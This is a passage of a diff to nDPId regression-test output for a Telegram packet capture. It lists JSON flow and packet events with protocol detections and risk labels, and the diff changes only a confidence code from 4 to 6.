-00640{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":175,"source":"telegram.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779616036,"flow_last_seen":1588779616036,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1588779616036,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"91.108.16.4","src_port":23174,"dst_port":538,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Telegram","breed":"Acceptable","category":"Chat"}} +00640{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":175,"source":"telegram.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779616036,"flow_last_seen":1588779616036,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1588779616036,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"91.108.16.4","src_port":23174,"dst_port":538,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Telegram","breed":"Acceptable","category":"Chat"}} 00543{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":176,"source":"telegram.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":2,"flow_last_seen":1588779616070,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":106,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":106,"pkt_l4_len":72,"thread_ts_msec":1588779616070,"pkt":"KDc3AG3IEBMx8Tl2CABFAABcvxJAADMRYxZbbAgHwKgBTQIJWoYASDvF3EwAKRVlt6y8I22p7aDVl\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/8dyFcBg2rJeKPlGESYBovAAAAAAAAAAAAAA\/\/9XC83DXdwAAA=="} 00543{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":177,"source":"telegram.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":2,"flow_last_seen":1588779616076,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":106,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":106,"pkt_l4_len":72,"thread_ts_msec":1588779616076,"pkt":"KDc3AG3IEBMx8Tl2CABFAABc0gJAADMRUCVbbAgIwKgBTQIaWoYASCPC3EwAKRVlt6y8I22p7aDVl\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/8dyFcBg2rJeB44lwtn8SKAAAAAAAAAAAAAA\/\/9XC83DXdwAAA=="} 00544{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":178,"source":"telegram.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":2,"flow_last_seen":1588779616161,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":106,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":106,"pkt_l4_len":72,"thread_ts_msec":1588779616161,"pkt":"KDc3AG3IEBMx8Tl2CABFAABcHlxAADQR\/s5bbAwFwKgBTQILWoYASFH93EwAKRVlt6y8I22p7aDVl\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/8dyFcBg2rJe1WCcwi5EfVwAAAAAAAAAAAAA\/\/9XC83DXdwAAA=="} @@ -113,78 +113,78 @@ 00547{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":247,"source":"telegram.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":1,"flow_last_seen":1588779617174,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":122,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":122,"pkt_l4_len":88,"thread_ts_msec":1588779617174,"pkt":"8KNaMBgSKDc3AG3ICABFAABsqlYAAEARTFnAqAFNwKgBNFqGevgAWLgQjfykZ0OTWbVGSN3cMHZvNB3RufFF5FIV8MQ0P3KjKgWFEWl4FO4hV\/puQOILS4RjUor87I6iIoOnx\/A9NueumG+cX0HrNbBHt0bLwMXSB9A="} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":248,"source":"telegram.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779617174,"flow_last_seen":1588779617174,"flow_idle_time":200000,"flow_min_l4_payload_len":80,"flow_max_l4_payload_len":80,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":80,"midstream":0,"thread_ts_msec":1588779617174,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"87.11.205.195","src_port":23174,"dst_port":60723,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00549{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":248,"source":"telegram.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":1,"flow_last_seen":1588779617174,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":122,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":122,"pkt_l4_len":88,"thread_ts_msec":1588779617174,"pkt":"EBMx8Tl2KDc3AG3ICABFAABs\/QcAAEARlrXAqAFNVwvNw1qG7TMAWH9So7C\/sNzcuk+cyiR2EyU9Q\/nbaTxTjDBemDeFTsb5lNpyEwlgOlPEUd9m7ay58cjORIuAWP8IcwSg0vb1EIxOrmmqeB4nTaYDWzAgf8R5\/bQ="} -00774{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":248,"source":"telegram.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779617174,"flow_last_seen":1588779617174,"flow_idle_time":200000,"flow_min_l4_payload_len":80,"flow_max_l4_payload_len":80,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":80,"midstream":0,"thread_ts_msec":1588779617174,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"87.11.205.195","src_port":23174,"dst_port":60723,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"OpenVPN","breed":"Acceptable","category":"VPN"}} +00774{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":248,"source":"telegram.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779617174,"flow_last_seen":1588779617174,"flow_idle_time":200000,"flow_min_l4_payload_len":80,"flow_max_l4_payload_len":80,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":80,"midstream":0,"thread_ts_msec":1588779617174,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"87.11.205.195","src_port":23174,"dst_port":60723,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"OpenVPN","breed":"Acceptable","category":"VPN"}} 00545{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":255,"source":"telegram.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":2,"flow_last_seen":1588779617350,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":122,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":122,"pkt_l4_len":88,"thread_ts_msec":1588779617350,"pkt":"KDc3AG3I8KNaMBgSCABFAABsUAUAAEARpqrAqAE0wKgBTXr4WoYAWLDM6Td5ePjQrnTyke2EPHu3iQJhxLIf06esu8RwrHmFIT7cHf5ycIamk2yhxwjAfE09exZIgAEDzMDiso7KFMuIe8fjwzyyS3MKiG+Cd3eNuy0="} 00547{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":283,"source":"telegram.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":3,"flow_last_seen":1588779617856,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":122,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":122,"pkt_l4_len":88,"thread_ts_msec":1588779617856,"pkt":"KDc3AG3I8KNaMBgSCABFAABsRZ4AAEARsRHAqAE0wKgBTXr4WoYAWPxjToIQs5m5XoZB1qDehmfhJomQUeopOlZuJIIaL6qE8BgtmXQ6sqxHJAacGMTU5S5RgUjUPrOpUP\/aPObI3ORz5PRGJjnynufzdcsxdb\/ZTPY="} 00499{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":340,"source":"telegram.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":2,"flow_last_seen":1588779618677,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":90,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":90,"pkt_l4_len":56,"thread_ts_msec":1588779618677,"pkt":"EBMx8Tl2KDc3AG3ICABFAABMg0kAAEAREJTAqAFNVwvNw1qG7TMAOE0OU2RiXNjy8sJRKs8KhnTyEy6Nhnt95vQlharNkBkXr2lvtMgl2dlHhYY4WvPjXQkp"} 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":389,"source":"telegram.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779619914,"flow_last_seen":1588779619914,"flow_idle_time":200000,"flow_min_l4_payload_len":43,"flow_max_l4_payload_len":43,"flow_tot_l4_payload_len":43,"flow_avg_l4_payload_len":43,"midstream":0,"thread_ts_msec":1588779619914,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"192.168.1.1","src_port":47127,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":389,"source":"telegram.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":1,"flow_last_seen":1588779619914,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":85,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":85,"pkt_l4_len":51,"thread_ts_msec":1588779619914,"pkt":"EBMx8Tl2KDc3AG3ICABFAABHqTUAAEARTdLAqAFNwKgBAbgXADUAM25TALgBAAABAAAAAAAAA3d3dxFnb29nbGV0YWdzZXJ2aWNlcwNjb20AAAEAAQ=="} -00789{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":389,"source":"telegram.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779619914,"flow_last_seen":1588779619914,"flow_idle_time":200000,"flow_min_l4_payload_len":43,"flow_max_l4_payload_len":43,"flow_tot_l4_payload_len":43,"flow_avg_l4_payload_len":43,"midstream":0,"thread_ts_msec":1588779619914,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"192.168.1.1","src_port":47127,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.GoogleServices","breed":"Acceptable","category":"Web"},"dns": {"query":"www.googletagservices.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00789{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":389,"source":"telegram.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779619914,"flow_last_seen":1588779619914,"flow_idle_time":200000,"flow_min_l4_payload_len":43,"flow_max_l4_payload_len":43,"flow_tot_l4_payload_len":43,"flow_avg_l4_payload_len":43,"midstream":0,"thread_ts_msec":1588779619914,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"192.168.1.1","src_port":47127,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.GoogleServices","breed":"Acceptable","category":"Web"},"dns": {"query":"www.googletagservices.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00517{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":390,"source":"telegram.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":2,"flow_last_seen":1588779619916,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":101,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":101,"pkt_l4_len":67,"thread_ts_msec":1588779619916,"pkt":"KDc3AG3IAICPmq69CABFAABXwqhAAEAR9E7AqAEBwKgBTQA1uBcAQ5UvALiBgAABAAEAAAAAA3d3dxFnb29nbGV0YWdzZXJ2aWNlcwNjb20AAAEAAcAMAAEAAQAAAAAABMCoAZ0="} -00931{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":390,"source":"telegram.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1588779619914,"flow_last_seen":1588779619916,"flow_idle_time":200000,"flow_min_l4_payload_len":43,"flow_max_l4_payload_len":59,"flow_tot_l4_payload_len":102,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1588779619916,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"192.168.1.1","src_port":47127,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"23": {"risk":"Suspicious DNS Traffic","severity":"High","risk_score": {"total":760,"client":580,"server":180}}},"confidence": {"4":"DPI"},"proto":"DNS.GoogleServices","breed":"Acceptable","category":"Web"},"dns": {"query":"www.googletagservices.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"192.168.1.157"}} +00931{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":390,"source":"telegram.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1588779619914,"flow_last_seen":1588779619916,"flow_idle_time":200000,"flow_min_l4_payload_len":43,"flow_max_l4_payload_len":59,"flow_tot_l4_payload_len":102,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1588779619916,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"192.168.1.1","src_port":47127,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"23": {"risk":"Suspicious DNS Traffic","severity":"High","risk_score": {"total":760,"client":580,"server":180}}},"confidence": {"6":"DPI"},"proto":"DNS.GoogleServices","breed":"Acceptable","category":"Web"},"dns": {"query":"www.googletagservices.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"192.168.1.157"}} 00604{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":435,"source":"telegram.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1588779617174,"flow_last_seen":1588779621221,"flow_idle_time":200000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":240,"flow_tot_l4_payload_len":5232,"flow_avg_l4_payload_len":163,"midstream":0,"thread_ts_msec":1588779621221,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"192.168.1.52","src_port":23174,"dst_port":31480,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":597,"source":"telegram.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779625981,"flow_last_seen":1588779625981,"flow_idle_time":200000,"flow_min_l4_payload_len":355,"flow_max_l4_payload_len":355,"flow_tot_l4_payload_len":355,"flow_avg_l4_payload_len":355,"midstream":0,"thread_ts_msec":1588779625981,"l3_proto":"ip4","src_ip":"0.0.0.0","dst_ip":"255.255.255.255","src_port":68,"dst_port":67,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00931{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":597,"source":"telegram.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":1,"flow_last_seen":1588779625981,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":397,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":397,"pkt_l4_len":363,"thread_ts_msec":1588779625981,"pkt":"\/\/\/\/\/\/\/\/AICPmq69CABFAAF\/jrEAAEAR6r0AAAAA\/\/\/\/\/wBEAEMBa16\/AQEGAN7JmyKFuQAAAAAAAAAAAAAAAAAAAAAAAACAj5quvQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABjglNjNQEBPRP\/j5quvQABAAEfyzfOuCfrPQjbUAB0AQE5AgXcPC1kaGNwY2QtNi4xMC4xOkxpbnV4LTQuOS41Ny12Nys6YXJtdjdsOkJDTTI4MzUMDHBpMy5udG9wLm9yZ5EBATcPAXkhAwYMDxocKjM2Ojt3\/w=="} -00696{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":597,"source":"telegram.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779625981,"flow_last_seen":1588779625981,"flow_idle_time":200000,"flow_min_l4_payload_len":355,"flow_max_l4_payload_len":355,"flow_tot_l4_payload_len":355,"flow_avg_l4_payload_len":355,"midstream":0,"thread_ts_msec":1588779625981,"l3_proto":"ip4","src_ip":"0.0.0.0","dst_ip":"255.255.255.255","src_port":68,"dst_port":67,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DHCP","breed":"Acceptable","category":"Network"},"dhcp": {"hostname":"","fingerprint":"","class_ident":""}} +00696{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":597,"source":"telegram.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779625981,"flow_last_seen":1588779625981,"flow_idle_time":200000,"flow_min_l4_payload_len":355,"flow_max_l4_payload_len":355,"flow_tot_l4_payload_len":355,"flow_avg_l4_payload_len":355,"midstream":0,"thread_ts_msec":1588779625981,"l3_proto":"ip4","src_ip":"0.0.0.0","dst_ip":"255.255.255.255","src_port":68,"dst_port":67,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DHCP","breed":"Acceptable","category":"Network"},"dhcp": {"hostname":"","fingerprint":"","class_ident":""}} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":612,"source":"telegram.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779626393,"flow_last_seen":1588779626393,"flow_idle_time":200000,"flow_min_l4_payload_len":201,"flow_max_l4_payload_len":201,"flow_tot_l4_payload_len":201,"flow_avg_l4_payload_len":201,"midstream":0,"thread_ts_msec":1588779626393,"l3_proto":"ip4","src_ip":"192.168.1.43","dst_ip":"192.168.1.255","src_port":138,"dst_port":138,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00716{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":612,"source":"telegram.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":1,"flow_last_seen":1588779626393,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":243,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":243,"pkt_l4_len":209,"thread_ts_msec":1588779626393,"pkt":"\/\/\/\/\/\/\/\/BJImXJc1CABFAADlSCQAAIARbWnAqAErwKgB\/wCKAIoA0XdaEQLkXsCoASsAigC7AAAgRUVFRkZERUxGRUVQRkFDTkZDRUNERkZFREJEQ0VIQ0EAIEZIRVBGQ0VMRUhGQ0VQRkZGQUNBQ0FDQUNBQ0FDQUJOAP9TTUIlAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEQAAIQAAAAAAAAAAAOgDAAAAAAAAAAAhAFYAAwABAAAAAgAyAFxNQUlMU0xPVFxCUk9XU0UAAQCA\/AoAREVTS1RPUC1SQjVUMTJHAAoAAxAAAA8BVaoA"} -00769{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":612,"source":"telegram.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779626393,"flow_last_seen":1588779626393,"flow_idle_time":200000,"flow_min_l4_payload_len":201,"flow_max_l4_payload_len":201,"flow_tot_l4_payload_len":201,"flow_avg_l4_payload_len":201,"midstream":0,"thread_ts_msec":1588779626393,"l3_proto":"ip4","src_ip":"192.168.1.43","dst_ip":"192.168.1.255","src_port":138,"dst_port":138,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"NetBIOS.SMBv1","breed":"Dangerous","category":"System"}} +00769{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":612,"source":"telegram.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779626393,"flow_last_seen":1588779626393,"flow_idle_time":200000,"flow_min_l4_payload_len":201,"flow_max_l4_payload_len":201,"flow_tot_l4_payload_len":201,"flow_avg_l4_payload_len":201,"midstream":0,"thread_ts_msec":1588779626393,"l3_proto":"ip4","src_ip":"192.168.1.43","dst_ip":"192.168.1.255","src_port":138,"dst_port":138,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"NetBIOS.SMBv1","breed":"Dangerous","category":"System"}} 00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":613,"source":"telegram.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779626394,"flow_last_seen":1588779626394,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1588779626394,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"192.168.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00512{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":613,"source":"telegram.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":1,"flow_last_seen":1588779626394,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":92,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":92,"pkt_l4_len":58,"thread_ts_msec":1588779626394,"pkt":"\/\/\/\/\/\/\/\/KDc3AG3ICABFAABOW9EAAEARmjHAqAFNwKgB\/wCJAIkAOrFARg4BEAABAAAAAAAAIEZIRVBGQ0VMRUhGQ0VQRkZGQUNBQ0FDQUNBQ0FDQUJOAAAgAAE="} -00641{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":613,"source":"telegram.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779626394,"flow_last_seen":1588779626394,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1588779626394,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"192.168.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} +00641{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":613,"source":"telegram.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779626394,"flow_last_seen":1588779626394,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1588779626394,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"192.168.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} 00512{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":614,"source":"telegram.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":2,"flow_last_seen":1588779626394,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":92,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":92,"pkt_l4_len":58,"thread_ts_msec":1588779626394,"pkt":"\/\/\/\/\/\/\/\/KDc3AG3ICABFAABOiakAAEARbFnAqAFNwKgB\/wCJAIkAOrE9RhEBEAABAAAAAAAAIEZIRVBGQ0VMRUhGQ0VQRkZGQUNBQ0FDQUNBQ0FDQUJOAAAgAAE="} 00512{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":615,"source":"telegram.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":3,"flow_last_seen":1588779626394,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":92,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":92,"pkt_l4_len":58,"thread_ts_msec":1588779626394,"pkt":"\/\/\/\/\/\/\/\/KDc3AG3ICABFAABONx8AAEARvuPAqAFNwKgB\/wCJAIkAOrE5RhUBEAABAAAAAAAAIEZIRVBGQ0VMRUhGQ0VQRkZGQUNBQ0FDQUNBQ0FDQUJOAAAgAAE="} 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":695,"source":"telegram.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779628757,"flow_last_seen":1588779628757,"flow_idle_time":200000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":0,"thread_ts_msec":1588779628757,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"192.168.1.1","src_port":49764,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":695,"source":"telegram.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":1,"flow_last_seen":1588779628757,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":73,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":73,"pkt_l4_len":39,"thread_ts_msec":1588779628757,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA7n3IAAP8RmKDAqAFNwKgBAcJkADUAJ31bFnMBAAABAAAAAAAABGRhdGkEbnRvcANvcmcAAAEAAQ=="} -00765{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":695,"source":"telegram.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779628757,"flow_last_seen":1588779628757,"flow_idle_time":200000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":0,"thread_ts_msec":1588779628757,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"192.168.1.1","src_port":49764,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.ntop","breed":"Safe","category":"Network"},"dns": {"query":"dati.ntop.org","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00765{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":695,"source":"telegram.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779628757,"flow_last_seen":1588779628757,"flow_idle_time":200000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":0,"thread_ts_msec":1588779628757,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"192.168.1.1","src_port":49764,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.ntop","breed":"Safe","category":"Network"},"dns": {"query":"dati.ntop.org","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 